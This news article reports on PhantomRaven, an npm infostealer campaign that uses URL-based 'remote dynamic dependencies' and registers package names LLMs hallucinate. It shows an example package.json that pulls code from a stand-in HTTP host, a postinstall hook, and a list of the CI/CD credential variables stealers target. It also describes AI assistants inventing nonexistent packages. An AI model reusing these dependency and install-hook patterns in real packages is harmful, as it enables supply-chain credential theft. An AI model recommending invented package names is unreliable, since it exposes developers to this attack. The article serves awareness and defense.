100 Infostealer packages uploaded to NPM using AI hallucinations

Redazione RHC: 30 October 2025, 15:45

Since August 2024, the PhantomRaven campaign has uploaded 126 malicious packages to npm, which together have been downloaded more than 86,000 times. The campaign was discovered by Koi Security, which reported that the attacks rely on a little-known npm feature that lets packages evade protection and detection mechanisms.

At the time of the report’s publication, approximately 80 of the malicious packages were still active. The researchers explain that the attackers are exploiting a mechanism called Remote Dynamic Dependencies (RDD).

Normally, a developer sees all of a package’s dependencies at installation time, and they are downloaded from the trusted npm infrastructure. RDD, however, allows a package to pull code automatically from external URLs, even over an unencrypted HTTP channel, while npm’s dependency listing for the package appears empty, because URL-based dependencies are not shown the way ordinary registry dependencies are.
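As a minimal sketch of the mechanism (the package name, dependency name, and URL below are invented for illustration), a remote dynamic dependency is declared like any other dependency, except that the version field is a URL rather than a registry version range:

```json
{
  "name": "unused-imports-cleaner",
  "version": "1.2.0",
  "description": "Removes unused imports from JavaScript projects",
  "dependencies": {
    "ui-style-validator": "http://packages.example.com/npm/ui-style-validator"
  }
}
```

Because the code behind that URL lives on a server the attacker controls rather than on the registry, it can change at any moment and is never inspected by registry-side scanning.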

When a developer runs npm install, the malicious package silently downloads a payload from an attacker-controlled server and immediately executes it. No user interaction is required, and static analysis tools remain unaware of the activity.
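One common way such install-time execution works (a sketch of the general technique, not necessarily PhantomRaven’s exact payload) is through npm lifecycle scripts: the remotely fetched package declares an ordinary postinstall hook, which npm runs automatically during installation unless scripts are disabled with npm install --ignore-scripts. Continuing the invented names from the example above:

```json
{
  "name": "ui-style-validator",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node index.js"
  }
}
```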

“PhantomRaven demonstrates how sophisticated attackers can be when exploiting the blind spots of traditional security solutions. Remote dynamic dependencies are simply invisible to static analysis,” the researchers say.

Note that the malware is downloaded from the server each time the package is installed, rather than being cached.

This opens the door to targeted attacks: because the attackers see the IP address of every request, they can serve harmless code to security researchers, malicious code to corporate networks, and specialized payloads to cloud environments.

Once installed, the malware collects detailed information about the victim’s system (see the defensive sketch after this list):

  • environment variables containing configuration for the developer’s internal systems;
  • tokens and credentials for npm, GitHub Actions, GitLab, Jenkins, and CircleCI;
  • the entire CI/CD environment through which code changes made by different developers pass.
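To make the exposure concrete, the sketch below (defensive in intent; the variable names are common conventions rather than an authoritative list, and it assumes Node.js 18+ with @types/node) reports which commonly targeted credential variables would be visible to any script that runs during npm install on the current machine or CI runner:

```typescript
// Defensive sketch: these names are illustrative conventions, not an exhaustive list.
const sensitiveNames = [
  "NPM_TOKEN", "NODE_AUTH_TOKEN",           // npm registry/publish tokens
  "GITHUB_TOKEN", "ACTIONS_RUNTIME_TOKEN",  // GitHub Actions
  "CI_JOB_TOKEN",                           // GitLab CI
  "JENKINS_URL",                            // Jenkins
  "CIRCLECI", "CIRCLE_TOKEN",               // CircleCI
];

// Anything an install-time script can read via process.env, an infostealer can read too.
const exposed = sensitiveNames.filter((name) => process.env[name] !== undefined);

console.log(
  exposed.length > 0
    ? `Visible to install scripts: ${exposed.join(", ")}`
    : "None of the listed credential variables are set in this environment.",
);
```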

Stolen tokens can be used to attack supply chains and inject malicious code into legitimate projects. Exfiltration is built with redundancy, using three methods: HTTP GET requests with data encoded in the URL, HTTP POST requests with JSON bodies, and WebSocket connections.

The researchers note that many of the malicious packages are disguised as GitLab and Apache tools.

Slopsquatting, the exploitation of AI hallucinations, plays a special role in this campaign. Developers often ask LLM assistants which packages are best suited for a particular project, and the models frequently invent nonexistent but plausible-sounding names. PhantomRaven’s operators track these hallucinations and register packages under those names, so victims end up installing the malware themselves by following the LLM’s recommendations.

LLM developers do not yet fully understand the causes of these hallucinations and cannot build models that reliably prevent them, which is exactly what the attackers exploit. The researchers advise against relying on LLMs when choosing dependencies, and recommend carefully checking package names and sources and installing packages only from trusted publishers.
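In that spirit, one minimal check (a sketch assuming Node.js 18+ with global fetch; the package name queried is an invented example of a plausible hallucination) is to confirm that an LLM-suggested name actually exists on the public registry before installing it, and then to review its publisher and history rather than trusting the suggestion:

```typescript
// Sketch: query the public npm registry for a package's metadata.
// A 404 means the name is unregistered; a 200 only proves it exists,
// so publisher, age, and download history still need a human look.
async function packageExists(name: string): Promise<boolean> {
  const res = await fetch(`https://registry.npmjs.org/${encodeURIComponent(name)}`);
  return res.ok;
}

// "gitlab-pipeline-toolkit" is an invented, plausible-sounding name of the
// kind an assistant might hallucinate; replace it with the suggestion you received.
packageExists("gitlab-pipeline-toolkit").then((exists) => {
  console.log(exists ? "Registered on npm -- verify the publisher before installing." : "Not found on npm.");
});
```

Since slopsquatters register exactly these hallucinated names, a hit on the registry is only the starting point for review, not a green light.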

Redazione (Editorial Team)
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
